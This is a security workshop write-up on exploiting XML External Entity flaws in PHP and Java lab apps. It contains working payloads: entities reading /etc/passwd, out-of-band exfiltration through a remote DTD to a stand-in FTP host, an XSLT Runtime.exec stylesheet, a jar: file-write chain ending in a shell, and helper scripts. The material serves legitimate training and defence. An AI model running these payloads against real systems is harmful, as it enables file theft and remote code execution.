Welcome to this 3-hour workshop on XML External Entities (XXE) exploitation!

In this workshop, the latest XML eXternal Entities (XXE) and XML-related attack vectors will be presented. XXE is a vulnerability that affects any XML parser that evaluates external entities. It has gained visibility since its introduction in the OWASP Top 10 2017 (A4). You might be able to detect the classic patterns, but can you convert the vulnerability into a directory listing, binary file exfiltration, a file write or remote code execution?

The focus of this workshop will be presenting various techniques and exploitation tricks for both PHP and Java applications. Four applications will be at your disposal to test your skills. For every exercise, sample payloads are provided to save attendees some time.

Agenda:

Requirements

The first requirement is to have an HTTP interception proxy installed.

For the infrastructure, you will need:

Deploying Test Applications

To do the exercises, you will need to run the lab applications yourself. All applications were built with a Docker container recipe, which should make deployment easier.

  1. Download the code.
    $ git clone https://github.com/GoSecure/xxe-workshop
  2. Read the build instructions (%application_dir%/README.md). This step will differ for each application.
  3. Use docker-compose to start the application.
    $ docker-compose up

XML is everywhere

XML format examples

XML documents are used in plenty of file formats. You have probably already edited a configuration file written in XML. If you have built a website, you will inevitably edit or see HTML. You can also think about MS Office documents (.docx), Scalable Vector Graphics (.svg) and SOAP requests. Being widely implemented in most programming languages, XML is an excellent choice for interoperability. The XML standard describes many useful formatting features, but we are going to focus on "entities" because of the potential vulnerability they introduce.

What are XML entities?

XML entities are references to XML data inside XML documents. We say XML data because an entity can hold a literal string, XML tags or any XML syntax that is legal where it is inserted.

Entities in HTML are used for special characters

Entity in HTML

An entity can also be used for a repeated pattern

Entity use for repeated pattern
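As a minimal sketch in Python (the greeting entity and the sample document are made up for illustration), an internal entity declared once in the DOCTYPE is expanded everywhere it is referenced:

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document: one internal entity, referenced twice.
DOCUMENT = """<!DOCTYPE data [
  <!ENTITY greeting "Hello">
]>
<data>&greeting;, &greeting;!</data>"""


def expand_entities(document: str) -> str:
    """Parse the document and return the root text with entities expanded."""
    return ET.fromstring(document).text


if __name__ == "__main__":
    print(expand_entities(DOCUMENT))
```

The parser substitutes the entity value before the application sees the text, which is the same mechanism that external entities abuse.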

SYSTEM or External entities

Malicious XXE payload

When the keyword SYSTEM is added to an entity, the parser will attempt to load content from the specified URL. The value between quotes is the URL. For XML parsing done in a small script executed locally, this seems like a nice feature. However, when the parsing is done server-side, the URLs from SYSTEM entities are also resolved on the server. A malicious user could point the entity to a file stored on that server. If the server returns the parsing result, it will reveal the content of this file.

<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

If the application returns the value inside the data node, the content of the file /etc/passwd will be revealed.

Interesting files to read

passwd is a file that is universally present on Linux operating systems.

Hostnames, DNS resolvers and network device information can help discover additional assets.

The /proc virtual filesystem includes various files describing the current process.

A few files contain the system version. These files also have no special characters, which makes them useful for testing.

For testing purposes, it might be interesting to read a virtual file with infinite content. The objective of the attacker would be either time-based detection or some form of Denial of Service (DoS).

For this first exercise, we are using a website that renders Atom feeds. The service is at the URL: http://xxe-workshop.gosec.co:8021

Preview website

Solution

We start by submitting the form with the news feed (Atom feed) from the netsec subreddit.

Preview website

At this point, we can assume that the server is parsing this XML source because we are only seeing one HTTP request in our proxy. The URL could have been fetched from the browser in JavaScript but it is not the case here.

Serving your XML Files

For the workshop, you can use your shell to serve HTTP requests. As you can see below, you can start a simple web server with the command: python -m http.server 8123.

Preview website

Sending a basic payload

It is always best to start with a simple working XML file rather than submitting a complex and specific payload first. Sometimes a failure to load our XML is caused by a simple syntax issue. XML can be unforgiving regarding the order of XML syntax, mistyped elements and unsupported characters.

Preview website

Once the file is saved, you can submit a URL to this file. The URL must be public.

Preview website

The result page should look like the following. It is a confirmation that our base file is valid. An XML file with a format other than Atom will trigger an error.

Preview website

Confirming that XML Entities are enabled

Next, we will attempt to fetch a file on the file system with an XML entity. The Atom feed should look as follows.

Preview website
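For readers who prefer to generate the two test files, here is a rough Python sketch. The feed content (titles, id, date) is placeholder data and the helper name build_atom_feed is hypothetical; only the DOCTYPE and the &xxe; reference follow the payload pattern shown earlier.

```python
import xml.etree.ElementTree as ET

ATOM_NS = "http://www.w3.org/2005/Atom"


def build_atom_feed(entity_uri=None):
    """Return a minimal Atom feed.

    Without entity_uri the feed is a plain, valid base file.
    With entity_uri, an external entity is declared and referenced
    in the entry title.
    """
    doctype = ""
    entry_title = "First entry"
    if entity_uri is not None:
        doctype = (
            "<!DOCTYPE feed [\n"
            f'  <!ENTITY xxe SYSTEM "{entity_uri}">\n'
            "]>\n"
        )
        entry_title = "&xxe;"
    parts = [
        '<?xml version="1.0" encoding="UTF-8"?>\n',
        doctype,
        f'<feed xmlns="{ATOM_NS}">\n',
        "  <title>Workshop test feed</title>\n",
        "  <id>urn:uuid:00000000-0000-0000-0000-000000000001</id>\n",
        "  <updated>2020-01-01T00:00:00Z</updated>\n",
        "  <entry>\n",
        f"    <title>{entry_title}</title>\n",
        "    <id>urn:uuid:00000000-0000-0000-0000-000000000002</id>\n",
        "    <updated>2020-01-01T00:00:00Z</updated>\n",
        "  </entry>\n",
        "</feed>\n",
    ]
    return "".join(parts)


if __name__ == "__main__":
    # Write both files in the directory served by your web server.
    with open("basic.xml", "w", encoding="utf-8") as handle:
        handle.write(build_atom_feed())
    with open("xxe.xml", "w", encoding="utf-8") as handle:
        handle.write(build_atom_feed("file:///etc/passwd"))
```

Submitting the basic file first confirms the feed structure is accepted before the entity is introduced.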

As a result, we can see the content of the file /etc/passwd in the response.

Preview website

In the page source, the content of the file is easier to read because the new lines are preserved.

Preview website

Out-of-band Exfiltration

Remote XML parsing will not always return content directly. If you are uploading a document such as a data file (.xml) or an MS Office document (.docx), you might not receive the content parsed from those documents.

We need to find a way to exfiltrate data during the parsing. Unfortunately, it is not possible to refer to an entity from the URL of another entity declared in the same DOCTYPE. This limitation comes from the way XML parsers interpret the document.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ 
 <!ENTITY file SYSTEM "file:///etc/passwd">
 <!ENTITY notworking SYSTEM "http://xxe.me/&file;">
]>
<data></data>

This payload will not work

A workaround for this limitation was discovered by researchers Alexey Osipov and Timur Yunusov. It allows the construction of a URL with data coming from other entities. The first version of this payload uses the Gopher protocol.

XXE Gopher exfiltration

The previous technique was updated with a variant that replaces Gopher with the FTP protocol. It is very useful because Gopher is deprecated and only available in old versions of Java.

The following payload requires a remote DTD file to be hosted on a web server. The DTD file is taking care of doing the concatenation. The final objective is to evaluate ftp://test:%file;@my.ftp.server/. The file content is sent as a password.

payload sent

<?xml version="1.0"?>
<!DOCTYPE data [ 
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://your.host/remote.dtd"> 
%dtd;]>
<data>&send;</data>

http://your.host/remote.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://test:%file;@my.ftp.server/'>"> %all;
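The two documents above only differ by a few values between targets, so they can be templated. The following Python sketch reproduces them from parameters; the function names are hypothetical, and your.host and my.ftp.server are the same placeholders as above.

```python
def build_oob_payload(file_uri: str, dtd_url: str) -> str:
    """Return the XML sent to the target; it loads the remote DTD."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        f' <!ENTITY % file SYSTEM "{file_uri}">\n'
        f' <!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "%dtd;]>\n"
        "<data>&send;</data>\n"
    )


def build_remote_dtd(ftp_host: str, user: str = "test") -> str:
    """Return the DTD hosted by the attacker; it concatenates %file; into the FTP URL."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!ENTITY % all \"<!ENTITY send SYSTEM 'ftp://{user}:%file;@{ftp_host}/'>\"> %all;\n"
    )


if __name__ == "__main__":
    print(build_oob_payload("file:///etc/passwd", "http://your.host/remote.dtd"))
    print(build_remote_dtd("my.ftp.server"))
```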

In order to capture the file content, you need to record the password sent to your FTP server. To serve this purpose, Ivan Novikov has created a mock FTP server that responds just enough to record a password. (FTP clients will not authenticate if the handshake is incomplete.)
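To illustrate the idea, here is a small Python sketch of such a mock server. It is not Ivan Novikov's script nor the one shipped with the workshop; the response codes are the standard FTP replies (220, 331, 230, 221), and the names captured and start_mock_ftp are made up for this example. Every received line is recorded, since a multi-line file will arrive as several lines after PASS.

```python
import socketserver
import threading

captured = []  # every line received from clients, in order


class MockFTPHandler(socketserver.StreamRequestHandler):
    """Answer just enough of the FTP dialogue for the client to send PASS."""

    def handle(self):
        self.wfile.write(b"220 mock FTP ready\r\n")
        for raw in self.rfile:
            line = raw.decode("latin-1").rstrip("\r\n")
            captured.append(line)
            print("<", line)
            command = line.split(" ", 1)[0].upper()
            if command == "USER":
                self.wfile.write(b"331 password required\r\n")
            elif command == "PASS":
                self.wfile.write(b"230 logged in\r\n")
            elif command == "QUIT":
                self.wfile.write(b"221 bye\r\n")
                break
            else:
                # Generic positive reply for anything else (assumption).
                self.wfile.write(b"200 ok\r\n")


def start_mock_ftp(host="127.0.0.1", port=0):
    """Start the server in a background thread and return it."""
    server = socketserver.ThreadingTCPServer((host, port), MockFTPHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    srv = start_mock_ftp("0.0.0.0", 2121)
    print("listening on", srv.server_address)
    threading.Event().wait()  # block until interrupted
```

Port 2121 is an arbitrary choice that avoids needing root privileges; the FTP URL in the DTD would then need the matching port.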

For this second exercise, we are using a website that renders an SVG image based on the XML given. The service is at the URL: http://xxe-workshop.gosec.co:8022

Preview website

Solution

First exploration

When reusing the technique from the previous exercise, we can see that the file content is displayed on a single line. This makes it hard to exfiltrate text files. In many real-world cases, the result will simply not be displayed to the user. The parsing will be hidden and possibly done asynchronously.

Simple XXE test in SVG parser

Out-of-band with the FTP protocol

Now, we are going to attempt to exfiltrate the file with the out-of-band DTD technique. The XML payload will look as follows:

XML payload XXE out-of-band

The DTD referenced in the XML payload is a file hosted on a server that we control. The DTD serves the purpose of concatenating the file content to the FTP URL.

XXE DTD with FTP URL

Instead of using a real FTP server, we will use a dummy one that responds to a few FTP commands and displays all content received, including the password. We expect to receive the file content in the password. shell-workshop.gosec.co is the host from which you are running the mock FTP server. If you are running everything locally, you can use localhost.

XXE Dummy FTP

As you can see, the mock FTP service covers only three FTP commands. You can get the Ruby script in the workshop repository.

Sending the XML payload

The payload should look like this.

XXE Request URL escaped in Burp

An easier way is to use the encoding tags from the HackVertor plugin. It is a good encoding tool for quickly testing payloads without re-encoding them on every request.

XXE Request with Burp HackVertor

Payload execution

Every step of the XML parsing can fail because of a small error. If you get a result different from the screenshots, investigate the potential causes.

First, the DTD is fetched. This confirms that our XML payload is well-formed. If the DTD is not fetched, verify the URL you specified in the XML entity.

XXE HTTP Request Received

Second, the FTP server is contacted. This confirms that the concatenation succeeded.

XXE FTP Request Received

Exploring the file system

You can continue exploring the file system by modifying your XML payload and seeing the result on your shell in the dummy FTP server output.

XXE Exploring file system

Introduction

We already mentioned the php:// protocol. This protocol, available only on PHP of course, provides a few options to encode or decode file content.

XXE has major limitations regarding which files can be read. In general, you can't read non-ASCII characters or special characters that are not XML compatible. You might have noticed this when doing the first two exercises.

Encoding file content

In order to read files with special characters, we can take advantage of the php protocol.

php://filter/convert.base64-encode/resource=/source_code.zip

Reference: php:// - php.net documentation

This new capability opens the door to reading most configuration files, database files and more.
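As a small illustration, the filter URI can be built for any path and the Base64 response decoded offline. This Python sketch uses only the standard library; the helper names are hypothetical.

```python
import base64


def php_base64_filter(resource: str) -> str:
    """Build a php://filter URI that Base64-encodes the given resource."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def decode_exfiltrated(blob: str) -> bytes:
    """Decode the Base64 text copied from the response.

    Whitespace is removed first because the page rendering may wrap
    or indent the encoded content (assumption).
    """
    cleaned = "".join(blob.split())
    return base64.b64decode(cleaned)


if __name__ == "__main__":
    print(php_base64_filter("/source_code.zip"))
```

Because the output is plain Base64, binary content such as ZIP archives or SQLite databases survives the XML parsing intact.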

Other interesting protocols

Here is an exhaustive list of protocols that could be useful when exploiting XXE.

file: protocol

Access files with a relative or absolute path

Examples:

http: protocol

Nothing surprising here. You can trigger a GET request to an HTTP service. While it can be a starting point for Server-Side Request Forgery (SSRF), the response is not likely to be readable because most web pages are not valid XML.

Example:

Note on https://169.254.169.254/latest/user-data: AWS metadata URLs now require a special header. It is unlikely that you will be able to access them with XXE.

ftp: protocol

This protocol allows you to connect to an FTP server to read a file (this requires knowing the exact file location and the credentials to authenticate) or to exfiltrate data (see the next exercise).

Example:

gopher: protocol

Another option for data exfiltration is the gopher protocol. It allows connecting to any server over TCP and sending an arbitrary message. The path section of the URL is the data that will be written to the TCP socket. It is rarely available as it requires very old versions of Java.

jar: protocol

The jar protocol is a very special case. It is only available in Java applications. It allows access to files inside a PKZIP archive (.zip, .jar, ...). You will see in the last exercise how it can be used to write files to a remote server.

Example:

netdoc: protocol

This protocol is an alternative to the file:// protocol. It is of limited use. It is often cited as a method to bypass WAF rules that block specific strings such as file:///etc/passwd.

Example:

For this third exercise, we are using a website that is very similar to the first exercise. It also parses Atom feeds. It is, however, written in a different language: PHP. The service is at the URL: http://xxe-workshop.gosec.co:8022

Preview website

Solution

Using a PHP filter

As in the first exercise, we are going to host a malicious Atom feed on a web server. This XML document will use the PHP base64-encoding filter inside an XML entity.

We are targeting the file /.svn/wc.db, a metadata file containing SVN history information. Hopefully, we can obtain additional information on the codebase.

XXE PHP filter payload

The response will be in Base64 because this is what we instructed the server to do with the filter. To read the original content, we can decode it with a variety of decoding tools. In Burp, you can press Ctrl+Shift+B to decode your selection.

XXE Decoding the Base64 response in Burp

In the extracted .svn/wc.db file, we can see that filenames are exposed, including some pages we did not know existed!
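The filenames can also be listed programmatically, since wc.db is a SQLite database. The Python sketch below assumes the working copy format used by SVN 1.7 and later, where tracked paths are stored in the local_relpath column of the NODES table; if the schema differs on your target, the query needs adjusting. The function name is hypothetical.

```python
import base64
import os
import sqlite3
import tempfile


def list_svn_paths(b64_blob: str) -> list:
    """Decode a Base64-encoded wc.db and return the tracked relative paths."""
    raw = base64.b64decode("".join(b64_blob.split()))
    fd, path = tempfile.mkstemp(suffix=".db")
    try:
        with os.fdopen(fd, "wb") as handle:
            handle.write(raw)
        conn = sqlite3.connect(path)
        try:
            # Assumption: SVN 1.7+ schema (table NODES, column local_relpath).
            rows = conn.execute(
                "SELECT DISTINCT local_relpath FROM NODES ORDER BY local_relpath"
            ).fetchall()
        finally:
            conn.close()
    finally:
        os.remove(path)
    # The working copy root is stored as an empty path; skip it.
    return [row[0] for row in rows if row[0]]
```

Calling list_svn_paths with the Base64 text copied from the response returns a sorted list of paths that can then be requested one by one.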

Hidden page

The SVN metadata file revealed that a PHP script was present at /test_dev.php.

Hidden page found

We can use the same filter technique to view the source code of this page. Here is the payload.

Viewing PHP source

When the response is received, we can decode the Base64 blob to view the PHP source.

Decoding the Base64 response in Burp

jar: purpose

The jar protocol is only available in Java applications. It allows access to files inside a PKZIP file (.zip, .jar, ...).

It works for local files:

jar:file:///var/myarchive.zip!/file.txt

And for remote files:

jar:https://download.host.com/myarchive.zip!/file.txt

Behind the scenes

What is happening behind the scenes with the HTTP URL with a remote ZIP? There are in fact multiple steps that lead to the file being extracted.

  1. It makes an HTTP request to load the zip archive. https://download.host.com/myarchive.zip
  2. It saves the HTTP response to a temporary location. /tmp/...
  3. It extracts the archive.
  4. It reads the requested file (file.txt).
  5. It deletes the temporary files.

What if we manage to stop the sequence at the second step? It is possible to do so! The trick is to never close the connection when serving the file in step 2. The client, in this case the web application, will download as much as it can and write the content as it arrives. To accomplish this, we need a modified or custom web server that will hang on purpose. You can find two utilities that serve this purpose in the GitHub repository (one in Python, slow_http_server.py, and one in Java, slowserver.jar).
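The hanging behaviour can be sketched with the Python standard library alone. This is not the workshop's slow_http_server.py; it is a simplified illustration in which the handler sends the body without a Content-Length header and then sleeps, so the client keeps waiting for the end of the response. The names make_slow_handler and hold_seconds, and the port 8123, are hypothetical.

```python
import http.server
import threading
import time


def make_slow_handler(payload: bytes, hold_seconds: float):
    """Build a handler that sends the payload, then keeps the socket open."""

    class SlowHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-Type", "application/zip")
            # No Content-Length: the client reads until the connection closes.
            self.end_headers()
            self.wfile.write(payload)
            self.wfile.flush()
            # Hold the connection; the client cannot finish the download yet.
            time.sleep(hold_seconds)

        def log_message(self, *args):
            pass  # keep the console quiet

    return SlowHandler


if __name__ == "__main__":
    with open("payload.zip", "rb") as handle:  # hypothetical file name
        data = handle.read()
    server = http.server.ThreadingHTTPServer(
        ("0.0.0.0", 8123), make_slow_handler(data, hold_seconds=600)
    )
    server.serve_forever()
```

While the handler sleeps, the temporary copy on the target stays on disk, which is the window the next steps rely on.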

Once the server has downloaded your file, you need to find its location by browsing the temp directory. Because the file name is random, the path can't be predicted in advance.

Jar

Writing files in a temporary directory can help escalate another vulnerability that involves a path traversal (such as local file include, template injection, XSLT RCE, deserialization, etc).

Complement: XSLT RCE

Extensible Stylesheet Language Transformations (XSLT) is a text format that describes transformations applied to XML documents. The official specification provides basic transformations. Languages such as Java and .NET have introduced extensions that allow methods to be invoked from the stylesheet. The Java implementation is more prone to vulnerabilities because the extension is enabled by default. It can access every class in the classpath.

If you are seeing a feature that allows you to configure an XSLT file in a Java application, remote code execution might be possible.

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:str="http://xml.apache.org/xalan/java/java.lang.String"
exclude-result-prefixes="date">
    <xsl:output method="text"/>
    <xsl:template match="/">
    <xsl:variable name="cmd"><![CDATA[touch /tmp/test1234]]></xsl:variable>
    <xsl:variable name="rtObj" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
    <xsl:text>Process: </xsl:text><xsl:value-of select="$process"/>
    </xsl:template>
</xsl:stylesheet>

In the root node, classes (such as java.lang.Runtime and java.lang.String) are imported for later reference. To customize the previous payload, you need to edit the value assigned to the cmd variable. The touch command can be replaced with any command available on the server.

Preview website

Solution

Generating a script

To exploit this service, we will need to evaluate multiple URLs with the same XXE base payload. To send those similar requests, we can encapsulate the logic inside a script.

Here is a demonstration of the Burp plugin Reissue Request Scripter. The request exported is the POST request to /admin/upload.

Generating script in Burp

Generated script in Burp

Configuring the exploit script

For this exercise, an exploit script is provided to you. The only segment to edit is the session cookie.

Editing generated script

You can test that the script is working properly by evaluating a test file. The script has only one argument: the file to evaluate (python exploit.py [FILE]). In the capture below, we are executing python exploit.py /etc/issue.

Launching XXE script

Exploiting with the jar protocol

To persist a file for more than a second, we must serve it with a web server that holds the connection open as long as possible. A simple Tornado server is provided in the workshop repository. You can see in the script that a call to the sleep function prevents the connection from closing when the function returns. As soon as the connection closes, the Java application would attempt to extract the ZIP and dispose of the file, leaving us no time to use the file written to disk.

Slow HTTP server script

The file that will be served is a malicious stylesheet. For more information, refer to the previous section.

In the following stylesheet, we are invoking the method chain Runtime.getRuntime().exec("/bin/busybox ....").

XSLT payload

Putting the pieces together

Step 1: Starting the "slow" HTTP server

Slow HTTP server

Step 2: Uploading our file

Slow HTTP server

Step 3: Browsing to find the full path of the file

Slow HTTP server

Step 4: Exploit path traversal

Path traversal Burp

Step 5: Interact with shell

NC Shell

The problem

If the parsed XML is not returned and the network out-of-band channel is not available (aggressive network filtering), is the XML parser still exploitable? For a few years, this case was considered unexploitable.

Error-based exfiltration

Filename exception

One of the remaining channels is error messages. This channel is available if the application is configured to return detailed error messages.

Method without external DTD

Can we do a concatenation trick without an external DTD? The short answer is: yes, we can! Arseniy Sharoglazov found an interesting technique that allows us to use a local DTD instead of an external DTD.

We need to find an entity that is declared and used in the same DTD. Here is an example taken from /usr/share/xml/fontconfig/fonts.dtd.

[...]
<!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '>
<!ELEMENT patelt (%constant;)*>
[...]

If we replace the constant entity with the following XML injection, we can evaluate arbitrary XML. Our objective is to perform a concatenation within this injection point.

<!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '>

<!ELEMENT patelt (%constant;)*>

The malicious XML we are looking to inject in the [MALICIOUS] placeholder is the following:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">

When %eval is evaluated, the concatenation will occur.

Overview

In summary, here are the steps that will be needed during the XML parsing:

  1. Initialize local DTD
  2. Override one of its entities (replace the entity)
  3. Evaluate ELEMENT and ENTITY from the local DTD

The final evaluation should trigger the injection of new entities doing the same concatenation trick used in external DTD.

Final payload

The payload we are going to send will look like this:

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

<!ENTITY % constant '><!ENTITY &#x25; file SYSTEM
"file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY
&#x26;#x25; error SYSTEM
&#x27;file:///nonexistent/&#x25;file;&#x27;>"><!ELEMENT
dummy(123 '>
<!ELEMENT patelt (%constant;)*>


    %local_dtd;
]>
<message></message>

To see it in action, move on to the next section.

If you want to know more about the different injection patterns, visit this blog post: Automating local DTD discovery for XXE exploitation.

Preview website

Solution

Triggering a FileNotFoundException

First, we need to build a base payload that simply triggers a FileNotFoundException. We need to confirm that error messages are returned to the client.

Burp request file not found

Using Intruder to Brute Force DTD

In order to find if at least one interesting DTD is present on the remote server, we are going to need to brute force it with a huge list of potential paths.

Request to intruder

The content that will change in our request is the path. The XML around this path will not change and it needs to be URL encoded.
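The same encoding can be prepared outside Burp. In the Python sketch below, the XML prefix and suffix are an assumed shape of the base payload (a DOCTYPE that only loads the candidate DTD), and the candidate paths are illustrative; adapt both to the request you captured.

```python
from urllib.parse import quote

# Assumed fixed XML around the path; only the path changes per request.
PREFIX = '<!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file://'
SUFFIX = '"> %local_dtd;]><message></message>'


def encode_candidates(paths):
    """Return one fully URL-encoded XML payload per candidate DTD path."""
    return [quote(PREFIX + path + SUFFIX, safe="") for path in paths]


if __name__ == "__main__":
    # Illustrative candidates; a real attempt would use a much larger list.
    candidates = [
        "/usr/share/xml/fontconfig/fonts.dtd",
        "/usr/share/sgml/docbook/dtd/4.5/docbookx.dtd",
    ]
    for encoded in encode_candidates(candidates):
        print(encoded)
```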

Request to intruder prefix suffix

Filtering attempt

Once Intruder is done with the brute force attack, we can filter the results with a negative search.

Intruder filter

Intruder is not showing the initial value from our list, but the final value encoded. For this reason, we need to decode the path from the request.
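If you copy the encoded value out of Burp, the path can be recovered with a few lines of Python. This sketch assumes the path appears in a SYSTEM "file://..." declaration inside the encoded XML; the function name is hypothetical.

```python
import re
from urllib.parse import unquote_plus


def extract_dtd_path(encoded_value: str):
    """URL-decode the value and return the file path of the SYSTEM entity."""
    decoded = unquote_plus(encoded_value)
    match = re.search(r'SYSTEM\s+"file://([^"]+)"', decoded)
    return match.group(1) if match else None


if __name__ == "__main__":
    sample = "%3C%21ENTITY%20%25%20local_dtd%20SYSTEM%20%22file%3A%2F%2F%2Ftmp%2Fa.dtd%22%3E"
    print(extract_dtd_path(sample))
```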

Intruder result decoding url

Using the DTD found

Once a DTD with a known overridable entity is found, we can start to poke at files to exfiltrate.

You can reuse an XXE payload from this list. Only the file entity needs to be changed. The path to the DTD (local_dtd) and the dummy path (/nonexistent) remain unchanged.

File content received

You can view the complete attack in this video.

A misconfigured XML parser can open doors to attackers. Being able to read files on the vulnerable server is the main concern. But as you saw in this workshop, being able to read key files can lead to remote command execution.

From a developer's perspective, you can prevent such issues by properly configuring the XML parser used in your application. Some libraries have a secure configuration by default, but it is best to verify with a reference such as the OWASP Cheat Sheet in the references below.
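As one possible defensive pattern, an application that never needs DTDs can refuse any document that declares a DOCTYPE. The sketch below shows the idea in Python with the standard expat bindings; the workshop targets are PHP and Java, so treat it as an illustration of the principle rather than a drop-in fix. The names DoctypeForbidden and assert_no_doctype are hypothetical.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def assert_no_doctype(data: bytes) -> None:
    """Parse the document and raise DoctypeForbidden if it declares a DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def reject(name, system_id, public_id, has_internal_subset):
        # Called by expat as soon as the DOCTYPE declaration starts,
        # before any entity declared in it is processed.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = reject
    parser.Parse(data, True)


if __name__ == "__main__":
    assert_no_doctype(b"<data>ok</data>")
    try:
        assert_no_doctype(
            b'<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b"<data>&xxe;</data>"
        )
    except DoctypeForbidden as error:
        print("rejected:", error)
```

Rejecting the DOCTYPE outright blocks both external entities and the local DTD technique, at the cost of refusing legitimate documents that rely on a DTD.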

References